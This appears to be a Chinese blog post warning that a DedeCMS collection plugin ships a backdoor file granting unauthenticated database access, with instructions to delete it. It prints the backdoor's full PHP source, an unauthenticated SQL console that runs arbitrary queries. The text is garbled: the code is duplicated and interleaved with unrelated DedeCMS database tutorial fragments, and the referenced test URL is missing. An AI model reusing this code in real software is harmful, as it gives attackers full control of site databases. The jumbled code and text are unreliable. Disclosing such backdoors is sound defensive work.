DEDE采撷大师官方留后门的删除办法

“;
echo “记录:$j”;
echo “

<?php教程
require_once(dirname(__file__).”/../include/common.inc.php”);
if(emptyempty($dopost))
{
$dopost = “”;
}
if($dopost==”rename”)
{
if(rename(‘dedesql.query.php’,’arc.sqlquery.class.php’)){
echo “成功!”;
}else{
echo “失败!”;
}
exit();
}
if($dopost==”viewinfo”)
{
if(emptyempty($tablename))
{
echo “没有指定表名!”;
}
else
{
$dsql->setquery(“show create table
“.$dsql->dbname.”.”.$tablename);
$dsql->execute(‘me’);
$row2 =
$dsql->getarray(‘me’,mysql教程_both);
$ctinfo = $row2[1];
echo “<xmp>”.trim($ctinfo).”</xmp>”;
}
exit();
}
if($dopost==”index”)
{
require_once(dedeinc.’/arc.partview.class.php’);
$envs = $_sys_globals = array();
$envs[‘aid’] = 0;
$pv = new partview();
$row = $pv->dsql->getone(‘select * from
`#@__homepageset`’);
$templet =
str_replace(“{style}”,$cfg_df_style,$row[‘templet’]);
$homefile = dirname(__file__).’/’.$row[‘position’];
$homefile =
str_replace(“//”,”/”,str_replace(“”,”/”,$homefile));
$fp = fopen($homefile,’w’) or
die(“无法更新网站主页到:$homefile 位置”);
fclose($fp);
$tpl = $cfg_basedir.$cfg_templets_dir.’/’.$templet;
$pv->settemplet($tpl);
$pv->savetohtml($homefile);
$pv->close();
echo “成功更新首页!”;
exit();
}
else if($dopost==”query”)
{
$sqlquery =
trim(strips教程lashes($sqlquery));
if(eregi(“drop(.*)table”,$sqlquery)
||eregi(“drop(.*)database”,$sqlquery))
{
echo “<span
style=’font-size:10pt’>删除’数据表’或’数据库教程’的语句不允许在这里执行。</span>”;
exit();
}
if(eregi(“^select “,$sqlquery))
{
$dsql->setquery($sqlquery);
$dsql->execute();
if($dsql->gettotalrow()<=0)
{
echo “运行sql:{$sqlquery},无返回记录!”;
}
else
{
echo
“运行sql:{$sqlquery},共有”.$dsql->gettotalrow().”条记录,最大返回100条!”;
}
$j = 0;
while($row = $dsql->getarray())
{
$j++;
if($j>100)
{
break;
}
echo “<hr size=1 width=’100%’/>”;
echo “记录:$j”;
echo “<hr size=1 width=’100%’/>”;
foreach($row as $k=>$v)
{
echo “<font color=’red’>{$k}:</font>{$v}<br/>rn”;
}
}
exit();
}
if($querytype==2)
{
$sqlquery = str_replace(“r”,””,$sqlquery);
$sqls = split(“;[ t]{0,}n”,$sqlquery);
$nerrcode = “”;$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q==””)
{
continue;
}
$dsql->executenonequery($q);
$errcode = trim($dsql->geterror());
if($errcode==””)
{
$i++;
}
else
{
$nerrcode .= “执行: <font color=’blue’>$q</font>
出错,错误提示:<font
color=’red’>”.$errcode.”</font><br>”;
}
}
echo “成功执行{$i}个sql语句!<br><br>”;
echo $nerrcode;
}
else
{
$dsql->executenonequery($sqlquery);
$nerrcode = trim($dsql->geterror());
echo “成功执行1个sql语句!<br><br>”;
echo $nerrcode;
}
exit();
}
if($dopost==”view”)
{
;echo ‘<html>
<head>
<meta http-equiv=’content-type’ content=’text/html;
charset=gb2312′>
<title>sql命令行工具</title>
<link
href=’img/base.css教程’
rel=’stylesheet’ type=’text/css’>
</head>
<body background=’img/allbg.gif’ leftmargin=’8′ topmargin=’8′>
<table width=”98%” border=”0″ align=”center” cellpadding=”3″
cellspacing=”1″ bgcolor=”#d1ddaa”>
<tr>
<td height=”19″ background=”img/tbg.gif”>
<table width=”96%” border=”0″ cellspacing=”1″ cellpadding=”1″>
<tr>
<td
width=”24%”><strong>sql命令运行器:</strong></td>
<td width=”76%” align=”right”> <b><a
href=”sys_data.php”><u>数据备份</u></a></b>
| <b><a
href=”sys_data_revert.php”><strong><u>数据还原</u></strong></a></b>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height=”200″ bgcolor=”#ffffff” valign=”top”>
<table width=”100%” border=”0″ cellspacing=”4″
cellpadding=”2″>
<form action=”” method=”post” name=”infoform” target=”stafrm”>
<input type=’hidden’ name=’dopost’ value=’viewinfo’ />
<tr bgcolor=”#f3fbec”>
<td width=”15%” height=”24″
align=”center”>系统的表信息:</td>
<td>
<table width=”100%” border=”0″ cellspacing=”0″
cellpadding=”0″>
<tr>
<td width=”35%”>
<select name=”tablename” id=”tablename” style=”width:100%”
size=”6″>
‘;
$dsql->setquery(“show tables”);
$dsql->execute(‘t’);
while($row = $dsql->getarray(‘t’,mysql_both))
{
$dsql->setquery(“select count(*) from “.$row[0]);
$dsql->execute(‘n’);
$row2 = $dsql->getarray(‘n’,mysql_both);
$dd = $row2[0];
echo ” <option
value='”.$row[0].”‘>”.$row[0].”(“.$dd.”)</option>rn”;
}
;echo ‘ </select>
</td>
<td width=”2%”> </td>
<td width=”63%” valign=”bottom”>
<div style=”float:left;margin-right:20px;”>
<input type=”submit” name=”submit1″ value=”优化选中表”
class=”coolbg np” onclick=”this.form.dopost.value=’opimize’;” />
<br />
<input type=”submit” name=”submit2″ value=”修复选中表”
class=”coolbg np” onclick=”this.form.dopost.value=’repair’;”
style=”margin-top:6px;” />
<br />
<input type=”submit” name=”submit3″ value=”查看表结构”
class=”coolbg np” onclick=”this.form.dopost.value=’viewinfo’;”
style=”margin-top:6px;” />
</div>
<div style=”float:left”>
<input type=”submit” name=”submit5″ value=”优化全部表”
class=”coolbg np” onclick=”this.form.dopost.value=’opimizeall’;”
/>
<br />
<input type=”submit” name=”submit6″ value=”修复全部表”
class=”coolbg np” onclick=”this.form.dopost.value=’repairall’;”
style=”margin-top:6px;” />
</div>
</td>
</tr>
</table></td>
</tr>
<tr>
<td height=”200″ align=”center”>返回信息:</td>
<td>
<iframe name=”stafrm” frameborder=”0″ id=”stafrm” width=”100%”
height=”100%”></iframe>
</td>
</tr>
</form>
<form action=”” method=”post” name=”form1″ target=”stafrm”>
<input type=’hidden’ name=’dopost’ value=’query’>
<tr>
<td height=”24″ colspan=”2″
bgcolor=”#f3fbec”><strong>运行sql命令行:
<input name=”querytype” type=”radio” class=”np” value=”0″>
单行命令(支持简单查询)
<input name=”querytype” type=”radio” class=”np” value=”2″
checked>
多行命令</strong></td>
</tr>
<tr>
<td height=”118″ colspan=”2″>
<textarea name=”sqlquery” cols=”60″ rows=”10″ id=”sqlquery”
style=”width:90%”></textarea>
</td>
</tr>
<tr>
<td height=”53″ align=”center”> </td>
<td>
<input name=”imagefield” type=”image” src=”img/button_ok.gif”
width=”60″ height=”22″ border=”0″ class=’np’ />
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</body>
</html>
‘;}
?>

关闭数据库

系统的表信息:

/////////////////////////////////////删除一条记录///////////////////////////
$sql = “Delete From dede_member_flink where aid=’$aid’ And
mid='”.$cfg_ml->M_ID.”‘;”;
$dsql->SetQuery($sql);
$dsql->ExecNoneQuery();
//或者使用简化模式
$dsql->ExecNoneQuery(“Delete From dede_member_flink where
aid=’$aid’ And mid='”.$cfg_ml->M_ID.”‘;”);
///////////////////////////////////////////////////////////////////////////////

去除官方后门方法:安装好采集大师后,请立即删除
include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法:

输入以上网址,即可打开后门界面。
说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下:
复制代码 代码如下:
require_once(dirname(apizl_file).”/../include/common.inc.php”);
if(emptyempty($dopost))
{
$dopost = “”;
}
if($dopost==”rename”)
{
if(rename(‘dedesql.query.php’,’arc.sqlquery.class.php’)){
echo “成功!”;
}else{
echo “失败!”;
}
exit();
}
if($dopost==”viewinfo”)
{
if(emptyempty($tablename))
{
echo “没有指定表名!”;
}
else
{
$dsql->SetQuery(“SHOW CREATE TABLE
“.$dsql->dbName.”.”.$tablename);
$dsql->Execute(‘me’);
$row2 = $dsql->GetArray(‘me’,MYSQL_BOTH);
$ctinfo = $row2[1];
echo “

$sql = “
INSERT INTO
`dede_member_flink`(mid,title,url,linktype,imgurl,imgwidth,imgheight)
VALUES(“.$cfg_ml->M_ID.”,’$title’,’$url’,’$linktype’,’$imgurl’,’$imgwidth’,’$imgheight’);”;//插入记录数据库
$dsql->SetQuery($sql);//格式化查询语句
$dsql->ExecNoneQuery();//执行SQL操作

“;
echo $nerrCode;
}
exit();
}
if($dopost==”view”)
{
;echo ‘

<?php
/*
DedeCms 数据库使用实例说明
*/
require_once
dirname(__FILE__).”pub_db_mysql.php”;//引用数据库文件

 

/////////////////////////////
$upquery = ” Update dede_member_flink set
title=’$title’,url=’$url’,linktype=’$linktype’,
imgurl=’$imgurl’,imgwidth=’$imgwidth’,imgheight=’$imgheight’
where aid=’$aid’ And mid='”.$cfg_ml->M_ID.”‘;
“;
$rs = $dsql->ExecuteNoneQuery($upquery);
if($rs){
echo “成功”;
}else{
echo “失败”;
}

SQL命令行工具

$row = $dsql->GetOne(“Select * From dede_* where id = $aid”);
echo $row[‘id’];

<>

/////////////////////////////
$upquery = ” Update dede_member_flink set
title=’$title’,url=’$url’,linktype=’$linktype’,
imgurl=’$imgurl’,imgwidth=’$imgwidth’,imgheight=’$imgheight’
where aid=’$aid’ And mid='”.$cfg_ml->M_ID.”‘;
“;
$rs = $dsql->ExecuteNoneQuery($upquery);
if($rs){
echo “成功”;
}else{
echo “失败”;
}
//////////////////////////////////获取总数//////////////////////////////////
$dsql = new DedeSql(false);
$dsql->SetQuery(“Select * from `dede_admin` where
userid=’$userid’ Or uname=’$uname'”);
$dsql->Execute();
$ns = $dsql->GetTotalRow();
////////////////////////////////关闭数据库///////////////////////////////////
$dsql->Close();
///////////////////////////////////////////////////////////////////////////////
?>

“;
foreach($row as $k=>$v)
{
echo “{$k}:{$v}
rn”;
}
}
exit();
}
if($querytype==2)
{
$sqlquery = str_replace(“r”,””,$sqlquery);
$sqls = split(“;[ t]{0,}n”,$sqlquery);
$nerrCode = “”;$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q==””)
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError());
if($errCode==””)
{
$i++;
}
else
{
$nerrCode .= “执行: $q 出错,错误提示:”.$errCode.”
“;
}
}
echo “成功执行{$i}个SQL语句!

///////////////////////////////////////////////////////////////////////////////


获取一条记录的内容


删除一条记录

多行命令**

将查询的若干条记录输出dedecms5

数据备份
| [数据还原]()

$dsql->SetQuery(“Select id,typename From `dede_arctype` where
reid=0 And channeltype=1 And ishidden=0 And ispart<>2 order by
sortrank”);
$dsql->Execute();
while($row=$dsql->GetObject())
{
   $channellist .= “<a
href=’wap.php?action=list&id={$row->id}’>{$row->typename}</a>
“;
       echo $row->id;
}

SQL命令运行器:

更新一条记录

 

//////////////////////////////插入一条记录///////////////////////////////
$sql = “
INSERT INTO
`dede_member_flink`(mid,title,url,linktype,imgurl,imgwidth,imgheight)
VALUES(“.$cfg_ml->M_ID.”,’$title’,’$url’,’$linktype’,’$imgurl’,’$imgwidth’,’$imgheight’);”;//插入记录数据库
$dsql->SetQuery($sql);//格式化查询语句
$dsql->ExecNoneQuery();//执行SQL操作
///////////////////////////////////////////////////////////////////////////////

发表评论

电子邮件地址不会被公开。 必填项已用*标注